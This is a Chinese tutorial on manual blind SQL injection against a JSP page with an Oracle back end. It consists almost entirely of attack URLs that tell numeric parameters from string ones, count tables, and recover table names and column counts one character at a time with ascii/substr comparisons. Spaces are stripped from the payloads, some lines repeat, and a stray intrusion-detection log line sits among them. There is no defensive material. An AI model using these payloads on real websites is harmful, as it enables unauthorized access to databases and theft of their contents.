手工注射JSP学习
手工注射JSP学习
发布时间:2016-12-26 来源:查字典编辑
摘要:1、判断注入类型(数字型还是字符型)字符型和数字型数据判断:(希望有人能进一步的细化,细分为数字型和字符型判断两部分)http://www....

1、判断注入类型(数字型还是字符型)

字符型和数字型数据判断:(希望有人能进一步的细化,细分为数字型和字符型判断两部分)

http://www.test.net/index_kaoyan_view.jsp?id=117Anduser>char(0)

http://www.test.net/index_kaoyan_view.jsp?id=117Anduser<char(0)

http://www.test.net/index_kaoyan_view.jsp?id=117'Anduser>char(0)And'1'='1

http://www.test.net/index_kaoyan_view.jsp?id=117'Anduser<char(0)And'1'='1

http://www.test.net/index_kaoyan_view.jsp?id=117'Anduser>char(0)And'%25'='

http://www.test.net/index_kaoyan_view.jsp?id=117'Anduser<char(0)And'%25'='

http://www.test.net/index_kaoyan_view.jsp?id=117)Anduser>char(0)And1in(1

http://www.test.net/index_kaoyan_view.jsp?id=117)Anduser<char(0)And1in(1

http://www.test.net/index_kaoyan_view.jsp?id=117')Anduser>char(0)And('')=('

http://www.test.net/index_kaoyan_view.jsp?id=117')Anduser<char(0)And('')=('

http://www.test.net/index_kaoyan_view.jsp?id=117Andstr(98)>str(97)

http://www.test.net/index_kaoyan_view.jsp?id=117Andstr(98)<str(97)

http://www.test.net/index_kaoyan_view.jsp?id=117'Andstr(98)>str(97)And'1'='1

http://www.test.net/index_kaoyan_view.jsp?id=117'Andstr(98)<str(97)And'1'='1

http://www.test.net/index_kaoyan_view.jsp?id=117'Andstr(98)>str(97)And'%25'='

http://www.test.net/index_kaoyan_view.jsp?id=117'Anduser<char(0)And'%25'=

http://www.test.net/index_kaoyan_view.jsp?id=117'Andstr(98)<str(97)And'%25'='

http://www.test.net/index_kaoyan_view.jsp?id=117)Andstr(98)>str(97)And1in(1

http://www.test.net/index_kaoyan_view.jsp?id=117)Andstr(98)<str(97)And1in(1

http://www.test.net/index_kaoyan_view.jsp?id=117')Andstr(98)>str(97)And('')=('

http://www.test.net/index_kaoyan_view.jsp?id=117')Andstr(98)<str(97)And('')=('

出现正常的页面:

http://www.test.net/index_kaoyan_view.jsp?id=117AndUSER>CHR(0)

http://www.test.net/index_kaoyan_view.jsp?id=117AndUSER<CHR(0)

2、猜解表数量和表名

数据库数量为3:

http://www.test.net/index_kaoyan_view.jsp?id=117And0<=nvl(length((SELECTCOUNT(*)FROMUSER_TABLES)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And1>=nvl(length((SELECTCOUNT(*)FROMUSER_TABLES)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And2<=nvl(length((SELECTCOUNT(*)FROMUSER_TABLES)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And4>=nvl(length((SELECTCOUNT(*)FROMUSER_TABLES)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And3=nvl(length((SELECTCOUNT(*)FROMUSER_TABLES)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117AndUNISTR(1)>UNISTR(0)

以下为猜解数据表数量

数据表第一位为:1

http://www.test.net/index_kaoyan_view.jsp?id=117And52=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),1,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And52>ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),1,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And49=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),1,1))

数据表第二位为:3

http://www.test.net/index_kaoyan_view.jsp?id=117And49=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And95=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And77=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And77>ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And70=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And70>ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And67=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And67>ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And65=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And65>ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And109=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And109>ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And102=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And102>ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And99=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And99>ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And97=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And97>ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And53=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And53>ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And51=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),2,1))

数据表第三位为:1

http://www.test.net/index_kaoyan_view.jsp?id=117And51=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And95=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And77=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And77>ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And70=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And70>ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And67=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And67>ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And65=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And65>ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And109=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And109>ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And102=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And102>ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And102>ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And99=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And99>ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And97=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And97>ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And54=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And54>ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And52=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And52>ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And52>ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And49=ascii(substr((SELECTCOUNT(*)FROMUSER_TABLES),3,1))

共有131个数据表,见上图。

以下为猜解表名称:

以下为判断第一个表的长度为:2

http://www.test.net/index_kaoyan_view.jsp?id=117And0<=nvl(length((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=1)ORDERBY1DESC)WHEREROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And0<=nvl(length((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=1)ORDERBY1DESC)WHEREROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And1>=nvl(length((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=1)ORDERBY1DESC)WHEREROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And2<=nvl(length((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=1)ORDERBY1DESC)WHEREROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And2<=nvl(length((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=1)ORDERBY1DESC)WHEREROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And4>=nvl(length((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=1)ORDERBY1DESC)WHEREROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And3=nvl(length((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=1)ORDERBY1DESC)WHEREROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And3>nvl(length((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=1)ORDERBY1DESC)WHEREROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And2=nvl(length((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=1)ORDERBY1DESC)WHEREROWNUM<=1)),0)

以下为判断第一个表的第一位值为:A

http://www.test.net/index_kaoyan_view.jsp?id=117And65=ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=1)ORDERBY1DESC)WHEREROWNUM<=1),1,1))

以下为判断第一个表AD的第二位值为:D

http://www.test.net/index_kaoyan_view.jsp?id=117And65=ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=1)ORDERBY1DESC)WHEREROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And95=ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=1)ORDERBY1DESC)WHEREROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And78=ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=1)ORDERBY1DESC)WHEREROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And78>ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=1)ORDERBY1DESC)WHEREROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And71=ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=1)ORDERBY1DESC)WHEREROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And71>ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=1)ORDERBY1DESC)WHEREROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And68=ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=1)ORDERBY1DESC)WHEREROWNUM<=1),2,1))

以下为判断第二个表的表ADER的表名长度为:4

http://www.test.net/index_kaoyan_view.jsp?id=117And0<=nvl(length((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And1>=nvl(length((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And2<=nvl(length((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And4>=nvl(length((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And3=nvl(length((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And3>nvl(length((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And4=nvl(length((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1)),0)

以下为判断第二个表ADER第一位的值为:A

http://www.test.net/index_kaoyan_view.jsp?id=117And65=ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),1,1))

以下为判断第二个表ADER第二位的值为:D

http://www.test.net/index_kaoyan_view.jsp?id=117And65=ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And95=ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And78=ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And78>ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And71=ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And71>ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And68=ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),2,1))

以下为判断第二个表ADER第三位的值为:E

http://www.test.net/index_kaoyan_view.jsp?id=117And68=ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And95=ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And79=ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And79>ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And73=ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And73>ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And73>ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And70=ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And70>ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And69=ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),3,1))

以下为判断第二个表ADER第四位的值为:R

http://www.test.net/index_kaoyan_view.jsp?id=117And69=ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),4,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And95=ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),4,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And80=ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),4,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And80>ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),4,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And80>ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),4,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And85=ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),4,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And85>ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),4,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And82=ascii(substr((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=2)ORDERBY1DESC)WHEREROWNUM<=1),4,1))

以下为判断第三个表的表名长度为:

http://www.test.net/index_kaoyan_view.jsp?id=117And0<=nvl(length((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=3)ORDERBY1DESC)WHEREROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And1>=nvl(length((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=3)ORDERBY1DESC)WHEREROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And2<=nvl(length((SELECTTABLE_NAMEFROM(SELECT*FROM(SELECT*FROM(SELECT*FROMUSER_TABLESORDERBY1ASC)WHEREROWNUM<=3)ORDERBY1DESC)WHEREROWNUM<=1)),0)

3、猜解列名长度和列名:

a)以下为猜解字段长度为:2位

http://www.test.net/index_kaoyan_view.jsp?id=117And0<=nvl(length((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68))),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And1>=nvl(length((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68))),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And2<=nvl(length((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68))),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And4>=nvl(length((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68))),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And3=nvl(length((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68))),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And3>nvl(length((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68))),0)

http://www.test.net/index_kaoyan_view.jsp?id=117And2=nvl(length((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68))),0)

l列名长度为:10位以上

以下猜解列名的长度的第一位为:1(十位)

http://www.test.net/index_kaoyan_view.jsp?id=117And52=ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),1,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And52>ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),1,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And49=ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),1,1))

以下猜解列名长度的第二位为:0(个位)

http://www.test.net/index_kaoyan_view.jsp?id=117And49=ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And95=ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And95=ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And77=ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

Informational10/12/200515:03:25Suspectevent:ICMPTimeExceeded(>1for1seconds)

http://www.test.net/index_kaoyan_view.jsp?id=117And77>ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And70=ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And70>ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And67=ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And67>ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And65=ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And65>ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And109=ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And109>ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And102=ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And102>ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And99=ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And99>ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And97=ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And97>ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And53=ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117And53>ascii(substr((SELECTCOUNT(*)FROMCOLSWHERETABLE_NAME=CHR(65)||CHR(68)),2,1))

